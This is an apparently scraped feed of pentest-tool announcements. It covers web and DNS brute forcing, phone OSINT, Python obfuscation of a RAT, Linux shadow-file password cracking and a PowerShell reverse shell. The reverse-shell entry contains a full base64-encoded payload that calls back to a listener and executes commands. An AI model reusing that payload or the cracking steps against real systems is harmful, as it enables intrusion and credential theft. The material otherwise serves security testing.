Rustbuster – DirBuster For Rust

DirBuster for Rust.UsageThere are three modules currently implemented: Dirbuster (default) rustbuster -m dir -u http://localhost:3000/ -w examples/wordlist -e php Dnsbuster rustbuster -m dns -u google.com -w examples/wordlist Vhostbuster rustbuster -m vhost -u http://localhost:3000/ -w examples/wordlist -d test.local -x “Hello" _ _ _ _ _ _ _ _ _ _ /\ \ /\_\ / /\ /\ \ / /\ /\_\ / /\ /\ \ /\ \ /\ \ / \ \/ / / _ / / \ \_\ \ / / \ / / / _ / / \ \_\ \ / \ \ / \ \ / /\ \ \ \ \__ /\_\/ / /\ \__ /\__ \ / / /\ \ \ \ \__ /\_\/ / /\ \__ /\__ \ / /\ \ \ / /\ \ \ / / /\ \_\ \___\ / / / / /\ \___\/ /_ \ \ / / /\ \ \ \ \___\ / / / / /\ \___\/ /_ \ \ / / /\ \_\ / / /\ \_\ / / /_/ / /\__ / / / /\ \ \ \/___/ / /\ \ \/ / /\ \_\ \ \__ / / / /\ \ \ \/___/ / /\ \ \/ /_/_ \/_/ / / /_/ / / / / /__\/ / / / / / / / \ \ \ / / / \/_/ / /\ \ \___\ / / / / / / \ \ \ / / / \/_/ /____/\ / / /__\/ / / / /_____/ / / / / / _ \ \ \ / / / / / / \ \ \__// / / / / _ \ \ \ / / / / /\____\/ / / /_____/ / / /\ \ \ / / /___/ / /_/\__/ / / / / / / / /____\_\ \ / / /___/ / /_/\__/ / / / / / / / /______ / / /\ \ \ / / / \ \ \/ / /____\/ /\ \/___/ / /_/ / / / /__________/ / /____\/ /\ \/___/ / /_/ / / / /_______/ / / \ \ \ \/_/ \_\/\/_________/ \_____\/ \_\/ \/_____________\/_________/ \_____\/ \_\/ \/__________\/_/ \_\/ ~ rustbuster v. 1.2.0 ~ by phra & ps1dr3x ~USAGE: rustbuster [FLAGS] [OPTIONS] –url –wordlist <wordlist>FLAGS: -f, –append-slash Tries to also append / to the base request -K, –exit-on-error Exits on connection errors -h, –help Prints help information -k, –ignore-certificate Disables TLS certificate validation –no-banner Skips initial banner –no-progress-bar Disables the progress bar -V, –version Prints version information -v, –verbose Sets the level of verbosityOPTIONS: -d, –domain <domain> Uses the specified domain -e, –extensions <extensions> Sets the extensions [default: ] -b, –http-body <http-body> Uses the specified HTTP method [default: ] -H, –http-header <http-header>… Appends the specified HTTP header -X, –http-method <http-method> Uses the specified HTTP method [default: GET] -S, –ignore-status-codes <ignore-status-codes> Sets the list of status codes to ignore [default: 404] -x, –ignore-string <ignore-string>… Ignores results with specified string in vhost mode -s, –include-status-cod es <include-status-codes> Sets the list of status codes to include [default: ] -m, –mode <mode> Sets the mode of operation (dir, dns, fuzz) [default: dir] -o, –output <output> Saves the results in the specified file [default: ] -t, –threads <threads> Sets the amount of concurrent requests [default: 10] -u, –url <url> Sets the target URL -a, –user-agent <user-agent> Uses the specified User-Agent [default: rustbuster] -w, –wordlist <wordlist> Sets the wordlistDownload Rustbuster

Link: http://feedproxy.google.com/~r/PentestTools/~3/HFSIPHDgci8/rustbuster-dirbuster-for-rust.html

PhoneInfoga – Advanced Information Gathering & OSINT Tool For Phone Numbers

PhoneInfoga is one of the most advanced tools to scan phone numbers using only free resources. The goal is to first gather standard information such as country, area, carrier and line type on any international phone numbers with very good accuracy. Then search for footprints on search engines to try to find the VoIP provider or identify the owner.FeaturesCheck if phone number exists and is possibleGather standard information such as country, line type, and carrierOSINT footprinting using external APIs, Google Hacking, phone books & search enginesCheck for reputation reports, social media, disposable numbers and moreScan several numbers at onceUse custom formatting for more effective OSINT reconnaissanceAutomatic footprinting on several custom formatsDownload PhoneInfoga

Link: http://www.kitploit.com/2019/06/phoneinfoga-advanced-information.html

Intensio-Obfuscator – Obfuscate A Python Code 2.X And 3.X

Takes a python source code and transform it into an obfuscated python code, replace name of variables – classes – functions to random chars and defined length, removes comments, line breaks and add to each line a random script with an always differents values.RequirementPython >= 3.5Files supportedFiles written in python 2.x and 3.xInstallationgit clone https://github.com/Hnfull/Intensio-Obfuscator.gitcd Intensio-Obfuscator/intensio/Features Feature Description Replace Replace all names of variables – classes – functions defined and remove all line breaks Padding Add random scripts after each line and remove all line breaks Remove Remove all commentaries and all line breaks Secret Only for the curious 🙂 Mixer lower Generate words with 32 chars that replace variables – classes – functions defined in source code and in random scripts if ‘replace’ or ‘padding’ features are specified Mixer medium Generate words with 64 chars that replace variables – classes – functions defined in source code and in random scripts if ‘replace’ or ‘padding’ features are specified Mixer high Generate words with 128 chars that replace variables – classes – functions defined in source code and in random scripts if ‘replace’ or ‘padding’ features are specified Usages-h, –help -> show this help message and exit.-f, –onefile -> if only one file.-d, –multiplefiles -> if multiple files (project).-i, –input -> source file or directory – if multiple files indicate a directory that contain all your files.-c, –code -> language used in input file or directory. value: [python]-o, –output -> output file or directory that will be obfuscated – if multiple file indicate a empty directory that will contain all your files.-m, –mixer -> length level of variables mix output. values: [lower,medium,high]-r, –replace -> activate the ‘replace’ obfuscation feature.-p, –padding -> activate the ‘padding’ obfuscation feature.-rm, –remove -> activate the ‘remove’ obfuscation f eature.-s, –secret -> activate the ‘secret’ bullshit feature.If you want exclude python variables – classes – functions which will be taken by the ‘replace’ feature, edit intensio/exclude_python_words.txtIf you want to include python variables – classes – functions that are not included when launching the ‘replace’ feature, edit intensio/include_python_words.txtDo not define identically your names of local variables – classes – functions to python keywords or names of functions – classes of imported python libraries !!ExamplesPython target file(s): Multiple files basic: python3.x intensio_obfuscator.py -d -i test/python/multiplefiles/basic/input/basicRAT -c python -o test/python/multiplefiles/basic/output/basicRAT -m lower -r -rm Source directory of projectOutput directory of project Multiple files advanced: python3.x intensio_obfuscator.py -d -i test/python/multiplefiles/advanced/input/basicRAT -c python -o test/python/multiplefiles/advanced/output/basicRAT -m high -r -p -rm Source directory of projectOutput directory of project If it’s one file only, the command is same that for multiple file, just do not pointed a directory but a python file directly for -i and -o parameters, then change -d parameter into -f parameter Possible malfunctionsIf a variable – class – function has an identical name with a word between ‘ ‘ or ” " in print() function, your text will have the same value that the mixer variables – class – function.If a variable – class – function has an identical name with a word in after # (commentary) your text will have the same value that the mixer variables – class – function, but if between """ or ”’ without a variables before, no replacing is performed.If you named your variables – classes – functions in the same way as python keywords or names of functions/class of imported python libraries, an error may appear. Edit intensio/excluded_python_words.txt to add the variables not to obfuscate or change your names of local variables – classes – fuctions, if your variables – classes – functions have the same name as a keyword it, he will be obfuscated and errors will appear.Todo Version 1.0.1-x: Code optimizationFix bugs and problemsImproved features already present Version 1.1.0: Support files written in C Version 1.2.0: Support files written in C++DisclamerIntensio-Obfuscator is for education/research purposes only. The author takes NO responsibility ay for how you choose to use any of the tools providedDownload Intensio-Obfuscator

Link: http://feedproxy.google.com/~r/PentestTools/~3/0dAHTVR5GAU/intensio-obfuscator-obfuscate-python.html

Faraday v3.8 – Collaborative Penetration Test and Vulnerability Management Platform

Here are the main new features and improvements in Faraday v3.8:Set up Faraday with a double click!We are committed to facilitate your work processes. With that in mind, we enhanced our installation phases, so now it’s easier to have Faraday on your devices: You can download our platform with just two clicks.This is the first step on the hard work we’re doing to migrate our platform to Python 3  (In progress!).Sailing downwind with Faraday on Docker!Explore Faraday’s whole potential by testing it first with our new Docker images. When you are ready, you can download the whole thing to set it up and upgrade your Risk Management Ecosystem :)More powerful than a sticky note!To provide value, information must be complete, updated and well focused. Now, you can enrich Vuln data by leaving Comments and Notes, while mentioning other users to notify them about important events in real time. Also, you are now able to configure alerts to follow up on each project, having a more efficient view of their status and updates.The idea behind this is promoting better ways to get involved with your co-workers by improving communication and daily results.New setting options on Web UI! Forget about logging in each time you want to send a Vuln to Jira or ServiceNOW.  Just configure the ticketing tool you’ll be using from the Settings menu and enjoy working seamlessly. Download Faraday v3.8

Link: http://www.kitploit.com/2019/06/faraday-v38-collaborative-penetration.html

TOR Router – A Tool That Allow You To Make TOR Your Default Gateway And Send All Internet Connections Under TOR

Tor Router allow you to use TOR as a transparent proxy and send all your trafic under TOR INCLUDING DNS REQUESTS, the only that you need is: a system using systemd (if you want to use the service) and tor.Script to install on distros using SystemD onlyIf you are using BlackArch Linux (https://blackarch.org) you can install the script from the repos using the following command: # pacman -S tor-routerTo install from source:~$ git clone https://gitlab.com/edu4rdshl/tor-router.git && cd ./tor-router && sudo bash install.shUsageIn distros using systemd, you should consideer using the install.sh script, anyways the process to install/configure tor-router is described here.It script require root privilegesOpen a terminal and clone the script using the following command:~$ git clone https://gitlab.com/edu4rdshl/tor-router.git && cd tor-router/filesPut the following lines at the end of /etc/tor/torrc# Seting up TOR transparent proxy for tor-routerVirtualAddrNetwork 10.192.0.0/10AutomapHostsOnResolve 1TransPort 9040DNSPort 5353Restart the tor serviceExecute the tor-router script as root# sudo ./tor-routerNow all your traffic is under TOR, you can check that in the following pages: https://check.torproject.org and for DNS tests: https://dnsleaktest.comIn order to automate the process of the script, you should add it to the SYSTEM autostart scripts according that the init that you are using, for systemd we have a .service file in the files folder.Uninstalling/StopingDelete the tor-router configuration lines in /etc/tor/torrc, disable the tor-router.service using systemctl (if you used the install.sh script), remove /usr/bin/tor-router, /etc/systemd/system/tor-router.service and restart your computer.Proof of conceptAfter of run the script, follow the next steps to ensure that all is working as expected:Ip hidden and TOR network configured: Visit https://check.torproject.org, you should see a message like it:Checking DNS Leaks: Visit https://dnsleaktest.com and make a extended test to see what are your DNS. You shloud get some like it:Distros using the scriptBlackArch Linux: https://github.com/BlackArch/blackarch/blob/master/packages/tor-routerDownload Tor-Router

Link: http://feedproxy.google.com/~r/PentestTools/~3/gvVN-pwmU4Y/tor-router-tool-that-allow-you-to-make.html

Zydra – File Password Recovery Tool And Linux Shadow File Cracker

Zydra is a file password recovery tool and Linux shadow file cracker. It uses the dictionary search or Brute force method for cracking passwords.Supported FilesRAR FilesLegacy ZIP FilesPDF FilesLinux Shadow Files (zydra can find all the user’s password in the linux shadow file one after the other)PrerequisitesTo run the app, minimal requirements are:Python 3.3 or higherdebian-based linux distro, preferably Kali linux 2qpdf and unrar packages Installing these packages on kali is as easy as running the following commands on terminal: $ sudo apt-get update $ sudo apt-get install qpdf unrarsome python modules in this program need to be installed manually, like: zipfile, rarfile, crypt, pyfiglet, py-term(for term module) and so on. you can use pip3 for install them example: $ pip3 install py-term notice: rar,zip and pdf files must have an extension, shadow files does not need an extension.DisclaimerThis tool is only for testing and academic purposes Do not use it for illegal purposes!FeaturesCracking files password using two methods: 1. dictionary method 2. brute force methodIn the brute force method, you can specify the min length and max length of the passwords.In the brute force method, you can specify the type of characters that may be used in the password.There is a percent progress bar showing how much of the process has been performed.Error handling.One of the most important features of Zydra is the multiprocessing feature that speeds up the program. For example if you have 8 CPU cores, Zydra will use all of them for processing at the same time.InstallationDownload Zydra by cloning the Git repository: $ git clone https://github.com/hamedA2/Zydra.gitUsageTo get a list of all options and learn how to use this app, enter the following command:$ python3 Zydra.py -h Examples1- Dictionary search to find the password for a zip file In this example I use rockyou.txt dictionary $ python3 Zydra.py –f file.zip –d rockyou.txt2- Brute force search to find the password for the users in the shadow file Minimum length of password is 4 and maximum length is 4 and we try to find passwords that are composed of numbers and symbols letters. $ python3 Zydra.py –f shadow –b digits,symbols –m 4 –x 4AuthorHamed HosseiniA special thank to, Hamed IzadiDownload Zydra

Link: http://feedproxy.google.com/~r/PentestTools/~3/6ATnAnKScCs/zydra-file-password-recovery-tool-and.html

ReverseTCPShell – PowerShell ReverseTCP Shell, Client & Server

Reverse Encrypted (AES 256-bit) Shell over TCP – using PowerShell SecureString.Attacker (C2-Server Listener):PS> .\ReverseTCP.ps1Target (Client):CMD> ECHO IEX([string]([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String({JABCAGEAcwBlADYANAA9ACIAOABHAEkAWABKADMAKwBBAE0AYgAzADIASgBXAEIAZgAyADkAdQBkAGoAcgBqAHYAeQBkAHUALwB4AFgARgBFAHUAYgB0AHQAVABhAHYAWAAwAGEAbwA9ACIAOwAkAEsAZQB5AD0AKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgBhAHMAZQA2ADQAKQApADsAJABDAGwAaQBlAG4AdAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJwAxADAALgAwAC4AMAAuADEAJwAsADQANAA0ADQAKQA7ACQAUwB0AHIAZQBhAG0APQAkAEMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAQgB5AHQAZQBzAD0AMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABSAGUAYQBkAD0AJABTAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAEIAeQB0AGUAcwAsACAAMAAsACAAJABCAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABDAG8AbQBtAGEAbgBkAD0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkAL gBHAGUAdABTAHQAcgBpAG4AZwAoACQAQgB5AHQAZQBzACwAMAAsACAAJABSAGUAYQBkACkAOwAkAEQAZQBDAG8AZABlAD0AJABDAG8AbQBtAGEAbgBkACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAIAAtAEsAZQB5ACAAJABLAGUAeQA7ACQATwB1AHQAUAB1AHQAPQAoAEkARQBYACgAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUAB0AHIAVABvAFMAdAByAGkAbgBnAEEAdQB0AG8AKABbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBTAGUAYwB1AHIAZQBTAHQAcgBpAG4AZwBUAG8AQgBTAFQAUgAoACQARABlAEMAbwBkAGUAKQApACkAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA7ACQARQBuAEMAbwBkAGUAPQBDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAAJABPAHUAdABQAHUAdAAgAC0AQQBzAFAAbABhAGkAbgBUAGUAeAB0ACAALQBGAG8AcgBjAGUAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAIAAtAEsAZQB5ACAAJABLAGUAeQA7ACQAUwBlAG4AZABCAHkAdABlAD0AKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAG UAdABCAHkAdABlAHMAKAAkAEUAbgBDAG8AZABlACkAOwAkAFMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABTAGUAbgBkAEIAeQB0AGUALAAwACwAJABTAGUAbgBkAEIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABTAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAQwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApADsARQB4AGkAdAA=}))));Exit | PowerShell -PoC:Payload Execution:Analyze Encrypted Traffic:Download ReverseTCPShell

Link: http://feedproxy.google.com/~r/PentestTools/~3/pWymKYDrZz8/reversetcpshell-powershell-reversetcp.html